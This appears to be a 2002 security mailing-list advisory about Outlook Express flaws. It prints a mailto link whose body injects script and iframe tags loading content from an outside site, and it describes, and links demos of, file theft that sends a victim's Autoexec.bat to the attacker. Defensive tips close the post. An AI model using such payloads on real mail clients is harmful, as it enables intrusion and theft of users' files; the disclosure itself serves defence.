Sunday, April 14, 2002

1. Not Possible

Technically it cannot be possible to create an html mail message from
a mailto url scheme without user input. However shoe-horning html in
through insertion of script tags does make it possible. Default
installation of Outlook Express and probably Outlook, is 'mail
sending format: html':

<a href="mailto: freakbloatedcorp.com
?cc=contestbloatedcorp.com
&subject=Million Dollar Contest
&body=<script></script>
<iframe src=http://www.malware.com'>">
 contestbloatedcorp.com </a>

This is not a good idea.

Working Example:

http://www.malware.com/$illine$$.html

Note: this is an 8th month
old 'thing':http://www.securityfocus.com/bid/3334

2. EVEN WORSE:

Trivial file theft using Outlook Express, maybe Outlook. Instead of
delivering files to the target computer, we rather take files from
the target computer. With a bit of Idiot Engineering, we reverse the
process as detailed here: http://www.securityfocus.com/bid/1221 and
here: http://www.kb.cert.org/vuls/id/31994.

Note: now almost 24 months old.

Working Example:

This will pluck and send your Autoexec.bat from a default Windows
installation. Targeted computers with specific files can prove more
lucrative.

http://www.malware.com/idiot$.html

Notes:

1. Outlook Express 6 default mail is in the 'restricted zone'.
Outlook Express 5.5 isn't. Disable Active X and all those other
things.

2. Do not send 'unknown' webmasters entire web pages despite how
tempting the request is.

3. Scraping the bottom of the barrel.

End Call.

--
http://www.malware.com

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]